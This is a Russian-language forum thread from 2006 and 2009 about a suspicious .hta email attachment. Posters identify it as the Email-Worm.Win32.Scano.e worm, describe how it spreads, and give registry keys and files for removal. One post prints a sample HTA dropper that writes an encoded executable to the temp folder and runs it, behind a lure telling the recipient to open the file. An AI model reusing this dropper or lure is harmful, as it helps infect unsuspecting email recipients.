Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Странныое сообщение (_________.hta ) (https://forum.antichat.xyz/showthread.php?t=21625)

TERYS 11.07.2006 21:48
Странныое сообщение (_________.hta )
 
Сегодня на 2 моих ящика пришло 2 примерно одинаковых сообщения, типа привет как дела ... вот заплатка или прога от нового вируса, но факт в том, что эти сообщения пришли с разных ящиков и с одним и тем же файликом

Имя файла: _________.hta
Размер файла: 60КБ

имя файла одинаковвые как на одном так и на другом мыле.
Что это может значить, и не приходило ли вам такое сообщение?

Вот залил эту прогу, толи заплатку сюда: http://slil.ru/22915583

Жду ответов...

r0 11.07.2006 22:14
скачал, открыл - vbs скрипт, и дира " C: " .. ... .. лог. бомба? =)

Eco[L]og 12.07.2006 02:41
это Email-Worm.Win32.Scano.e.
Расширение .hta это СИ

+toxa+ 12.07.2006 03:54
...троян это скорее всего.... у меня даже конвектор был exe2hta.....

Eco[L]og 12.07.2006 11:58
нет это не троян. я же написал что это червь....
он сканит машину на адреса почты. Ищит адреса в следующих файлах:
adb asp cfg cgi dbx dhtm dhtml eml htm html jsp mbx mdx mht mmf mra msg nch ods oft php pl sht shtm stm tbb txt uin wab wsh xls xml и рассылает себя по найденым адресам. Причем рассылает себя используя примое подключение к SMTP серваку.
Цитата:
Червь соединяется со следующими удаленными серверами для загрузки других файлов:
http://207.**.250.119
http://84.**.161.192
http://85.249.**.35
Для удаления, если уже подхватили:
Удалить из реестра вот эти записи.
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]
"Debugger"="%Windir%\csrss.exe"
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Application"="%Windir\csrss.exe"
и вот эти файлы
%Windir%\csrss.exe
C:\ntldr.exe

or1 06.02.2009 18:20
затрояненный HTA-файл может выглядеть примерно так.

<font color="#008000"><HTML>
<HEAD><hta:application />

<SCRIPT language="JavaScript">

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян

var fso = new ActiveXObject("Scripting.FileSystemObject");

var tf = fso.GetSpecialFolder(2); // Получим windows\temp
var fn = tf + "\\x.exe"; // Добавим имя файла

var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна
a.Write(unescape(code));
a.Close();

var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Exec(fn); // Запустим его

</SCRIPT>
</HEAD>
<BODY>
Привет, чувак!
TheBat не показывает картинки, так что открой этот файл в Ехплорере.
</BODY>
</HTML></font>
---------------------------------------------------------------------------------------------------
вопрос что за этот код и как и с чем его едят

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян

lmns 06.02.2009 22:34
or1, нах поднял тему 2-х летней давности?

awdrg 06.02.2009 22:35
некропостер!11один


Время: 23:02